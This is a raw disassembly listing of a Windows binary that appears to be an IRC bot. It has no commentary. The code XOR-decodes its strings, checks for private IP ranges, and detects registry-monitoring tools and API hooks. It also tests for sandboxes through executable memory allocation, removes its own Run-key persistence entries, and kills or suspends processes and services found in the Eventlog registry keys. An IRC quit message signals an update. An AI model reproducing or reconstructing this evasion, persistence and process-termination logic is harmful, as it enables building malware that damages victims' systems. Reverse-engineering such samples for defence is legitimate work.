mov ecx, offset a192_168__ ; "192.168.*.*"
call sub_419044
test eax, eax
jnz loc_419467
mov eax, esi
mov ecx, offset a10___ ; "10.*.*.*"
call sub_419044
test eax, eax
jnz loc_419467
mov eax, esi
mov ecx, offset a111___ ; "111.*.*.*"
call sub_419044
test eax, eax
jnz loc_419467
mov eax, esi
mov ecx, offset a15___ ; "15.*.*.*"
call sub_419044
test eax, eax
jnz loc_419467
mov eax, esi
mov ecx, offset a16___ ; "16.*.*.*"
call sub_419044
test eax, eax
jnz loc_419467
mov eax, esi
mov ecx, offset a101___ ; "101.*.*.*"
call sub_419044
test eax, eax
jnz short loc_419467
mov eax, esi
mov ecx, offset a110___ ; "110.*.*.*"
call sub_419044
test eax, eax
jnz short loc_419467
mov eax, esi
mov ecx, offset a112___ ; "112.*.*.*"
call sub_419044
test eax, eax
jnz short loc_419467
mov eax, esi
mov ecx, offset a170_65__ ; "170.65.*.*"
call sub_419044
test eax, eax
jnz short loc_419467
push 10h
pop esi
loc_41941E: ; CODE XREF: sub_419347+11A�j
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
push esi
push offset a172_D__ ; "172.%d.*.*"
stosd
lea eax, [ebp+var_24]
push 0Fh
push eax
call sub_402AEE
lea eax, [ebp+var_24]
add esp, 10h
lea edx, [eax+1]
loc_419441: ; CODE XREF: sub_419347+FF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_419441
sub eax, edx
mov [ebp+eax+var_24], cl
lea eax, [ebp+var_14]
lea ecx, [ebp+var_24]
call sub_419044
test eax, eax
jnz short loc_419467
inc esi
cmp esi, 1Fh
jbe short loc_41941E
xor al, al
jmp short loc_419469
; ---------------------------------------------------------------------------
loc_419467: ; CODE XREF: sub_419347+3E�j
; sub_419347+52�j ...
mov al, 1
loc_419469: ; CODE XREF: sub_419347+11E�j
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop esi
call sub_402710
leave
retn
sub_419347 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419477 proc near ; CODE XREF: J8@F_7_S:0041BAEA�p
; J8@F_7_S:0041C066�p
var_2A8 = byte ptr -2A8h
var_2A0 = dword ptr -2A0h
var_29C = dword ptr -29Ch
var_298 = dword ptr -298h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = byte ptr -28Ch
var_28B = byte ptr -28Bh
var_1CC = byte ptr -1CCh
var_1CB = byte ptr -1CBh
var_CC = byte ptr -0CCh
var_CB = byte ptr -0CBh
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2A8h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, 0BFh
xor ebx, ebx
push esi
mov [ebp+var_298], eax
lea eax, [ebp+var_CB]
push ebx
push eax
mov [ebp+var_CC], bl
call sub_407B70
add esp, 0Ch
push esi
lea eax, [ebp+var_28B]
push ebx
push eax
mov [ebp+var_28C], bl
call sub_407B70
add esp, 0Ch
push ebx
lea edi, [ebp+var_CC]
call sub_41B7F9
pop ecx
inc esi
push esi
mov eax, edi
push ebx
push eax
call sub_407B70
add esp, 0Ch
push esi
lea eax, [ebp+var_28C]
push ebx
push eax
call sub_407B70
add esp, 0Ch
push 0FFh
lea eax, [ebp+var_1CB]
push ebx
push eax
mov [ebp+var_1CC], bl
call sub_407B70
mov eax, ds:dword_433C4C
mov eax, [eax]
mov [ebp+var_290], eax
mov eax, offset dword_433C48
add esp, 0Ch
mov [ebp+var_294], eax
mov [ebp+var_2A0], eax
loc_419530: ; CODE XREF: sub_419477+102�j
mov eax, ds:dword_433C4C
lea edi, [ebp+var_2A0]
lea esi, [ebp+var_294]
mov [ebp+var_29C], eax
call sub_40166F
test al, al
jz short loc_419587
mov edi, offset aRegistryMonito ; "Registry Monitor"
call sub_40164F
mov esi, eax
add esi, 5
push 11h
pop ecx
xor eax, eax
repe cmpsb
lea esi, [ebp+var_294]
jz short loc_41957B
lea edi, [ebp+var_2A8]
call sub_40168C
jmp short loc_419530
; ---------------------------------------------------------------------------
loc_41957B: ; CODE XREF: sub_419477+F5�j
call sub_40164F
mov eax, [eax]
call sub_414023
loc_419587: ; CODE XREF: sub_419477+D7�j
mov edi, 100h
push edi
lea esi, [ebp+var_1CC]
mov ebx, offset byte_425119
call sub_4196D1
pop ecx
mov eax, esi
push eax
push offset aSoftwareMicr_1 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_416F32
add esp, 0Ch
push edi
mov eax, esi
push 0
push eax
call sub_407B70
add esp, 0Ch
call sub_4190BD
push [ebp+var_298]
mov edi, offset dword_4269BC
push offset aQuitSYouKilled ; "QUIT :%s YOU KILLED ME :< --UPDATED\r\n"
call sub_4172CC
pop ecx
pop ecx
push 0
call ds:dword_41D050
int 3 ; Trap to Debugger
jmp ds:dword_41D090
sub_419477 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4195EC proc near ; CODE XREF: J8@F_7_S:loc_41BC29�p
var_18 = byte ptr -18h
var_13 = byte ptr -13h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
push edi
call ds:dword_41D0CC
mov esi, offset dword_420700
lea edi, [ebp+var_10]
movsd
movsd
push 40h
push 3000h
movsb
push 6
mov ebx, eax
xor edi, edi
push edi
lea eax, [ebp+var_18]
push ebx
mov [ebp+var_10+3], eax
call ds:dword_41D0C0
mov esi, eax
cmp esi, edi
jnz short loc_419635
loc_419631: ; CODE XREF: sub_4195EC+58�j
xor al, al
jmp short loc_419668
; ---------------------------------------------------------------------------
loc_419635: ; CODE XREF: sub_4195EC+43�j
push edi
push 40h
push 6
push esi
push ebx
call ds:dword_41D0C4
test eax, eax
jnz short loc_419631
mov eax, [ebp+var_10]
mov [esi], eax
mov eax, [ebp+var_C]
mov [esi+4], eax
call esi
push 8000h
push edi
push esi
push ebx
call ds:dword_41D0C8
cmp [ebp+var_13], 0D0h
setnbe al
loc_419668: ; CODE XREF: sub_4195EC+47�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_4195EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419677 proc near ; CODE XREF: J8@F_7_S:0041BC07�p
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = byte ptr -0Ah
var_9 = byte ptr -9
var_8 = byte ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
push edi
push offset aMessageboxa_0 ; "MessageBoxA"
push offset aUser32_dll ; "user32.dll"
mov [ebp+var_C], 55h
mov [ebp+var_B], 8Bh
mov [ebp+var_A], 0ECh
mov [ebp+var_9], 81h
mov [ebp+var_8], 0ECh
call ds:dword_41D0E8
push eax
call ds:dword_41D0EC
push 5
mov esi, eax
pop ecx
xor eax, eax
lea edi, [ebp+var_C]
repe cmpsb
mov ecx, [ebp+var_4]
setz al
pop edi
xor ecx, ebp
pop esi
call sub_402710
leave
retn
sub_419677 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4196D1 proc near ; CODE XREF: sub_40177B+81�p
; sub_4019F3+81�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push edi
push [ebp+arg_0]
xor edi, edi
push edi
push esi
call sub_407B70
mov eax, ebx
add esp, 0Ch
lea ecx, [eax+1]
loc_4196EA: ; CODE XREF: sub_4196D1+1E�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4196EA
sub eax, ecx
jz short loc_41975B
mov eax, [ebp+arg_0]
dec eax
mov [ebp+var_4], eax
loc_4196FC: ; CODE XREF: sub_4196D1+88�j
mov eax, offset aHjdxzopvuvmrjf ; "hJdXZOPvUVmRJfVS"
lea edx, [eax+1]
loc_419704: ; CODE XREF: sub_4196D1+38�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_419704
sub eax, edx
jz short loc_419711
xor eax, eax
loc_419711: ; CODE XREF: sub_4196D1+3C�j
movsx ecx, byte ptr [edi+ebx]
movsx eax, byte ptr ds:aHjdxzopvuvmrjf[eax] ; "hJdXZOPvUVmRJfVS"
xor ecx, eax
xor ecx, 0FDh
push ecx
push esi
push offset dword_42072C
push [ebp+var_4]
push esi
call sub_402AEE
mov eax, esi
add esp, 14h
lea ecx, [eax+1]
loc_41973C: ; CODE XREF: sub_4196D1+70�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41973C
sub eax, ecx
mov [eax+esi], dl
mov eax, ebx
inc edi
lea ecx, [eax+1]
loc_41974E: ; CODE XREF: sub_4196D1+82�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41974E
sub eax, ecx
cmp edi, eax
jb short loc_4196FC
loc_41975B: ; CODE XREF: sub_4196D1+22�j
mov eax, esi
pop edi
leave
retn
sub_4196D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419760 proc near ; CODE XREF: sub_419C1D+28�p
var_3C = byte ptr -3Ch
var_38 = dword ptr -38h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 2Ch
push offset dword_4219D0
call __SEH_prolog4
mov edi, ds:dword_41D108
call edi
mov [ebp+var_20], eax
lea eax, [ebp+var_1C]
push eax
push 24h
lea eax, [ebp+var_3C]
push eax
push 0
push ebx
mov esi, ds:dword_41D028
call esi
test eax, eax
jnz short loc_41979B
loc_419790: ; CODE XREF: sub_419760+61�j
; sub_419760+8A�j ...
call ds:dword_41D0F0
jmp loc_41982F
; ---------------------------------------------------------------------------
loc_41979B: ; CODE XREF: sub_419760+2E�j
cmp [ebp+var_38], 1
jz loc_41982D
jmp short loc_4197D5
; ---------------------------------------------------------------------------
loc_4197A7: ; CODE XREF: sub_419760+79�j
push [ebp+var_24]
call ds:dword_41D0FC
lea eax, [ebp+var_1C]
push eax
push 24h
lea eax, [ebp+var_3C]
push eax
push 0
push ebx
call esi
test eax, eax
jz short loc_419790
cmp [ebp+var_38], 1
jz short loc_41982D
call edi
sub eax, [ebp+var_20]
cmp eax, 12Ch
ja short loc_4197EE
loc_4197D5: ; CODE XREF: sub_419760+45�j
cmp [ebp+var_38], 3
jz short loc_4197A7
lea eax, [ebp+var_3C]
push eax
push 1
push ebx
call ds:dword_41D01C
test eax, eax
jz short loc_419790
jmp short loc_419827
; ---------------------------------------------------------------------------
loc_4197EE: ; CODE XREF: sub_419760+73�j
; sub_419760+C5�j
mov eax, 5B4h
jmp short loc_41982F
; ---------------------------------------------------------------------------
loc_4197F5: ; CODE XREF: sub_419760+CB�j
push [ebp+var_24]
call ds:dword_41D0FC
lea eax, [ebp+var_1C]
push eax
push 24h
lea eax, [ebp+var_3C]
push eax
push 0
push ebx
call esi
test eax, eax
jz loc_419790
cmp [ebp+var_38], 1
jz short loc_41982D
call edi
sub eax, [ebp+var_20]
cmp eax, 12Ch
ja short loc_4197EE
loc_419827: ; CODE XREF: sub_419760+8C�j
cmp [ebp+var_38], 1
jnz short loc_4197F5
loc_41982D: ; CODE XREF: sub_419760+3F�j
; sub_419760+67�j ...
xor eax, eax
loc_41982F: ; CODE XREF: sub_419760+36�j
; sub_419760+93�j
call __SEH_epilog4
retn
sub_419760 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419835 proc near ; CODE XREF: sub_419EA0+2C7�p
; sub_419EA0+36E�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 30h
push ebx
push esi
push edi
push 10h
pop esi
lea eax, [ebp+var_10]
push eax
push [ebp+arg_4]
xor edi, edi
push edi
mov [ebp+var_8], esi
call ds:dword_41D034
test eax, eax
jnz short loc_41985C
loc_419858: ; CODE XREF: sub_419835+5F�j
xor al, al
jmp short loc_4198CD
; ---------------------------------------------------------------------------
loc_41985C: ; CODE XREF: sub_419835+21�j
mov eax, [ebp+var_10]
mov [ebp+var_2C], eax
mov eax, [ebp+var_C]
mov [ebp+var_28], eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_20]
push eax
push esi
mov esi, ds:dword_41D014
lea eax, [ebp+var_30]
push eax
push edi
push [ebp+arg_0]
xor ebx, ebx
inc ebx
mov [ebp+var_30], ebx
mov [ebp+var_24], edi
call esi
mov edi, ds:dword_41D0F0
call edi
test eax, eax
jnz short loc_419858
mov eax, [ebp+var_10]
mov [ebp+var_1C], eax
mov eax, [ebp+var_C]
mov [ebp+var_18], eax
xor eax, eax
cmp [ebp+arg_8], eax
mov [ebp+var_20], ebx
jz short loc_4198B2
or [ebp+var_14], 2
jmp short loc_4198B6
; ---------------------------------------------------------------------------
loc_4198B2: ; CODE XREF: sub_419835+75�j
and [ebp+var_14], 0FFFFFFFDh
loc_4198B6: ; CODE XREF: sub_419835+7B�j
push eax
push eax
push [ebp+var_8]
lea ecx, [ebp+var_20]
push ecx
push eax
push [ebp+arg_0]
call esi
call edi
neg eax
sbb al, al
inc al
loc_4198CD: ; CODE XREF: sub_419835+25�j
pop edi
pop esi
pop ebx
leave
retn
sub_419835 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4198D2 proc near ; CODE XREF: sub_419EA0+400�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
lea eax, [ebp+var_8]
push eax
push [ebp+arg_8]
xor ebx, ebx
push [ebp+arg_C]
mov [ebp+var_8], ebx
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_426570
test eax, eax
jnz short loc_419909
loc_4198F9: ; CODE XREF: sub_4198D2+70�j
; sub_4198D2+74�j
push [ebp+arg_C]
call sub_402B9B
pop ecx
pop edi
pop esi
mov al, bl
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_419909: ; CODE XREF: sub_4198D2+25�j
xor eax, eax
loc_41990B: ; CODE XREF: sub_4198D2+6C�j
and [ebp+var_4], 0
mov edx, offset dword_4255E8
loc_419914: ; CODE XREF: sub_4198D2+66�j
mov esi, [ebp+arg_C]
mov ecx, [edx+80h]
add esi, eax
mov edi, edx
xor ebx, ebx
repe cmpsb
jz short loc_419944
mov ecx, 84h
add [ebp+var_4], ecx
add edx, ecx
cmp [ebp+var_4], 318h
jb short loc_419914
inc eax
cmp eax, [ebp+var_8]
jbe short loc_41990B
xor bl, bl
jmp short loc_4198F9
; ---------------------------------------------------------------------------
loc_419944: ; CODE XREF: sub_4198D2+53�j
mov bl, 1
jmp short loc_4198F9
sub_4198D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419948 proc near ; CODE XREF: sub_419EA0+483�p
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1Ch
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_4]
mov [ebp+var_1C], 1Ch
call ds:dword_42656C
test eax, eax
jnz short loc_41996A
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_41996A: ; CODE XREF: sub_419948+1C�j
; sub_419948+55�j
mov eax, [ebp+var_10]
cmp eax, [ebp+arg_0]
jnz short loc_41998E
push [ebp+var_14]
push 0
push 1F03FFh
call ds:dword_426580
push eax
call ds:dword_41D0D4
cmp eax, 0FFFFFFFFh
jz short loc_41999F
loc_41998E: ; CODE XREF: sub_419948+28�j
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_4]
call ds:dword_426590
test eax, eax
jnz short loc_41996A
loc_41999F: ; CODE XREF: sub_419948+44�j
push [ebp+arg_4]
call ds:dword_41D0DC
mov al, 1
leave
retn
sub_419948 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4199AC proc near ; CODE XREF: sub_419EA0+3BD�p
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1Ch
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_4]
mov [ebp+var_1C], 1Ch
call ds:dword_42656C
test eax, eax
jnz short loc_4199CE
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_4199CE: ; CODE XREF: sub_4199AC+1C�j
; sub_4199AC+55�j
mov eax, [ebp+var_10]
cmp eax, [ebp+arg_0]
jnz short loc_4199F2
push [ebp+var_14]
push 0
push 1F03FFh
call ds:dword_426580
push eax
call ds:dword_41D0D8
cmp eax, 0FFFFFFFFh
jz short loc_419A03
loc_4199F2: ; CODE XREF: sub_4199AC+28�j
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_4]
call ds:dword_426590
test eax, eax
jnz short loc_4199CE
loc_419A03: ; CODE XREF: sub_4199AC+44�j
push [ebp+arg_4]
call ds:dword_41D0DC
mov al, 1
leave
retn
sub_4199AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419A10 proc near ; CODE XREF: sub_419EA0+3D4�p
var_228 = dword ptr -228h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 228h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push edi
push [ebp+arg_0]
xor ebx, ebx
push 8
call ds:dword_426574
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_419A49
loc_419A39: ; CODE XREF: sub_419A10+53�j
xor al, al
loc_419A3B: ; CODE XREF: sub_419A10+8D�j
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
; ---------------------------------------------------------------------------
loc_419A49: ; CODE XREF: sub_419A10+27�j
lea eax, [ebp+var_228]
push eax
push edi
mov [ebp+var_228], 224h
call ds:dword_426568
test eax, eax
jz short loc_419A39
loc_419A65: ; CODE XREF: sub_419A10+6B�j
inc ebx
cmp ebx, 1
jz short loc_419A81
lea eax, [ebp+var_228]
push eax
push edi
call ds:dword_426584
test eax, eax
jnz short loc_419A65
xor bl, bl
jmp short loc_419A94
; ---------------------------------------------------------------------------
loc_419A81: ; CODE XREF: sub_419A10+59�j
mov eax, [ebp+var_214]
mov [esi], eax
mov eax, [ebp+var_210]
mov [esi+4], eax
mov bl, 1
loc_419A94: ; CODE XREF: sub_419A10+6F�j
push edi
call ds:dword_41D0DC
mov al, bl
jmp short loc_419A3B
sub_419A10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=1B4h
sub_419A9F proc near ; CODE XREF: sub_419E55+2D�p
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = byte ptr -204h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-1B4h]
sub esp, 234h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+1B4h+var_4], eax
mov eax, [ebp+1B4h+arg_0]
push ebx
push esi
push edi
xor ebx, ebx
push 0FFh
mov [ebp+1B4h+var_224], eax
lea eax, [ebp+1B4h+var_103]
push ebx
push eax
mov [ebp+1B4h+var_234], offset aSoftwareMicr_2 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov [ebp+1B4h+var_230], offset aSoftwareMicr_3 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov [ebp+1B4h+var_22C], offset aSoftwareMicr_4 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov [ebp+1B4h+var_228], offset aSoftwareMicr_5 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov [ebp+1B4h+var_104], bl
call sub_407B70
mov esi, 100h
add esp, 0Ch
mov [ebp+1B4h+var_21C], esi
mov [ebp+1B4h+var_214], esi
mov [ebp+1B4h+var_20C], offset dword_4255DC
mov [ebp+1B4h+var_220], 2
loc_419B18: ; CODE XREF: sub_419A9F+160�j
mov [ebp+1B4h+var_208], ebx
loc_419B1B: ; CODE XREF: sub_419A9F+153�j
mov eax, [ebp+1B4h+var_208]
mov eax, [ebp+eax*4+1B4h+var_234]
lea ecx, [ebp+1B4h+var_210]
push ecx
push 1
push ebx
push eax
mov eax, [ebp+1B4h+var_20C]
push dword ptr [eax]
call ds:dword_41D02C
test eax, eax
jnz loc_419BE2
lea eax, [ebp+1B4h+var_214]
push eax
lea eax, [ebp+1B4h+var_204]
push eax
push ebx
push ebx
lea eax, [ebp+1B4h+var_21C]
push eax
lea eax, [ebp+1B4h+var_104]
push eax
mov [ebp+1B4h+var_218], ebx
push ebx
jmp short loc_419BCE
; ---------------------------------------------------------------------------
loc_419B58: ; CODE XREF: sub_419A9F+13D�j
xor edi, edi
loc_419B5A: ; CODE XREF: sub_419A9F+10C�j
mov eax, [ebp+1B4h+var_224]
lea edx, [eax+1]
loc_419B60: ; CODE XREF: sub_419A9F+C6�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_419B60
sub eax, edx
push eax
push [ebp+1B4h+var_224]
lea eax, [ebp+edi+1B4h+var_204]
push eax
call sub_4029E9
add esp, 0Ch
test eax, eax
jnz short loc_419B99
lea eax, [ebp+1B4h+var_104]
push eax
mov eax, [ebp+1B4h+var_208]
push [ebp+eax*4+1B4h+var_234]
mov eax, [ebp+1B4h+var_20C]
push dword ptr [eax]
call sub_416F32
add esp, 0Ch
loc_419B99: ; CODE XREF: sub_419A9F+DD�j
lea eax, [ebp+1B4h+var_204]
inc edi
lea edx, [eax+1]
loc_419BA0: ; CODE XREF: sub_419A9F+106�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_419BA0
sub eax, edx
cmp edi, eax
jbe short loc_419B5A
inc [ebp+1B4h+var_218]
lea eax, [ebp+1B4h+var_214]
push eax
lea eax, [ebp+1B4h+var_204]
push eax
push ebx
push ebx
lea eax, [ebp+1B4h+var_21C]
push eax
lea eax, [ebp+1B4h+var_104]
push eax
push [ebp+1B4h+var_218]
mov [ebp+1B4h+var_21C], esi
mov [ebp+1B4h+var_214], esi
loc_419BCE: ; CODE XREF: sub_419A9F+B7�j
push [ebp+1B4h+var_210]
call ds:dword_41D020
cmp eax, 103h
jnz loc_419B58
loc_419BE2: ; CODE XREF: sub_419A9F+98�j
push [ebp+1B4h+var_210]
call ds:dword_41D010
inc [ebp+1B4h+var_208]
cmp [ebp+1B4h+var_208], 4
jb loc_419B1B
add [ebp+1B4h+var_20C], 4
dec [ebp+1B4h+var_220]
jnz loc_419B18
mov ecx, [ebp+1B4h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 1B4h
leave
retn
sub_419A9F endp
; =============== S U B R O U T I N E =======================================
sub_419C1D proc near ; CODE XREF: sub_419C6D+189�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
push 0F003Fh
push 0
push 0
call ds:dword_41D024
push 0F01FFh
push [esp+10h+arg_0]
mov esi, eax
push esi
call ds:dword_41D044
mov edi, eax
mov ebx, edi
call sub_419760
push edi
call ds:dword_41D03C
test eax, eax
jz short loc_419C69
mov bl, 1
loc_419C57: ; CODE XREF: sub_419C1D+4E�j
push esi
mov esi, ds:dword_41D040
call esi
push edi
call esi
pop edi
pop esi
mov al, bl
pop ebx
retn
; ---------------------------------------------------------------------------
loc_419C69: ; CODE XREF: sub_419C1D+36�j
xor bl, bl
jmp short loc_419C57
sub_419C1D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=2C0h
sub_419C6D proc near ; CODE XREF: sub_419E55+35�p
; sub_419E55:loc_419E92�p
var_340 = dword ptr -340h
var_33C = dword ptr -33Ch
var_338 = dword ptr -338h
var_334 = byte ptr -334h
var_234 = byte ptr -234h
var_233 = byte ptr -233h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_34 = byte ptr -34h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-2C0h]
sub esp, 340h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+2C0h+var_4], eax
push esi
mov eax, [ebp+2C0h+arg_0]
push edi
push 0Bh
pop ecx
mov esi, offset aSystemControls ; "SYSTEM\\ControlSet001\\Services\\Eventlog\\"...
lea edi, [ebp+2C0h+var_34]
rep movsd
movsw
mov esi, 0FFh
push esi
mov [ebp+2C0h+var_340], eax
xor edi, edi
lea eax, [ebp+2C0h+var_233]
push edi
push eax
mov [ebp+2C0h+var_234], 0
call sub_407B70
push esi
lea eax, [ebp+2C0h+var_133]
push edi
push eax
mov [ebp+2C0h+var_134], 0
call sub_407B70
add esp, 18h
lea eax, [ebp+2C0h+var_33C]
push eax
push 0F003Fh
push edi
lea eax, [ebp+2C0h+var_34]
push eax
push 80000002h
call ds:dword_41D02C
test eax, eax
jnz loc_419E35
push ebx
mov ebx, 100h
push ebx
lea eax, [ebp+2C0h+var_134]
push eax
push edi
push [ebp+2C0h+var_33C]
mov [ebp+2C0h+var_338], edi
call ds:dword_41D018
cmp eax, 103h
jz loc_419E34
jmp short loc_419D2A
; ---------------------------------------------------------------------------
loc_419D25: ; CODE XREF: sub_419C6D+1C1�j
mov esi, 0FFh
loc_419D2A: ; CODE XREF: sub_419C6D+B6�j
push ebx
lea eax, [ebp+2C0h+var_334]
push edi
push eax
call sub_407B70
push ebx
lea eax, [ebp+2C0h+var_234]
push edi
push eax
call sub_407B70
lea eax, [ebp+2C0h+var_134]
push eax
lea eax, [ebp+2C0h+var_34]
push eax
push offset aSS_1 ; "%s\\%s"
lea eax, [ebp+2C0h+var_234]
push esi
push eax
call sub_402AEE
lea eax, [ebp+2C0h+var_234]
add esp, 2Ch
lea esi, [eax+1]
loc_419D6F: ; CODE XREF: sub_419C6D+107�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_419D6F
sub eax, esi
mov [ebp+eax+2C0h+var_234], cl
lea eax, [ebp+2C0h+var_134]
push offset aLdm ; "LDM"
push eax
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jz short loc_419E12
push 7
mov edi, offset aNetdde ; "NetDDE"
lea esi, [ebp+2C0h+var_134]
pop ecx
xor eax, eax
repe cmpsb
jz short loc_419E10
push ebx
lea eax, [ebp+2C0h+var_334]
push eax
push offset aEventmessagefi ; "EventMessageFile"
lea eax, [ebp+2C0h+var_234]
push eax
push 1
call sub_416ECD
add esp, 14h
test al, al
jz short loc_419E10
xor esi, esi
loc_419DCB: ; CODE XREF: sub_419C6D+1A1�j
mov eax, [ebp+2C0h+var_340]
lea edx, [eax+1]
loc_419DD1: ; CODE XREF: sub_419C6D+169�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_419DD1
sub eax, edx
push eax
push [ebp+2C0h+var_340]
lea eax, [ebp+esi+2C0h+var_334]
push eax
call sub_4029E9
add esp, 0Ch
test eax, eax
jnz short loc_419DFC
lea eax, [ebp+2C0h+var_134]
push eax
call sub_419C1D
pop ecx
loc_419DFC: ; CODE XREF: sub_419C6D+180�j
lea eax, [ebp+2C0h+var_334]
inc esi
lea edx, [eax+1]
loc_419E03: ; CODE XREF: sub_419C6D+19B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_419E03
sub eax, edx
cmp esi, eax
jbe short loc_419DCB
loc_419E10: ; CODE XREF: sub_419C6D+13B�j
; sub_419C6D+15A�j
xor edi, edi
loc_419E12: ; CODE XREF: sub_419C6D+127�j
inc [ebp+2C0h+var_338]
push ebx
lea eax, [ebp+2C0h+var_134]
push eax
push [ebp+2C0h+var_338]
push [ebp+2C0h+var_33C]
call ds:dword_41D018
cmp eax, 103h
jnz loc_419D25
loc_419E34: ; CODE XREF: sub_419C6D+B0�j
pop ebx
loc_419E35: ; CODE XREF: sub_419C6D+8A�j
push [ebp+2C0h+var_33C]
call ds:dword_41D010
mov ecx, [ebp+2C0h+var_4]
pop edi
xor ecx, ebp
pop esi
call sub_402710
add ebp, 2C0h
leave
retn
sub_419C6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419E55 proc near ; CODE XREF: sub_419EA0+42A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push [ebp+arg_0]
call ds:dword_41D0F8
test eax, eax
jz short loc_419E9C
push 7D0h
call ds:dword_41D0FC
push [ebp+arg_4]
call ds:dword_41D0D0
test eax, eax
push [ebp+arg_8]
jz short loc_419E92
call sub_419A9F
push [ebp+arg_8]
call sub_419C6D
pop ecx
jmp short loc_419E97
; ---------------------------------------------------------------------------
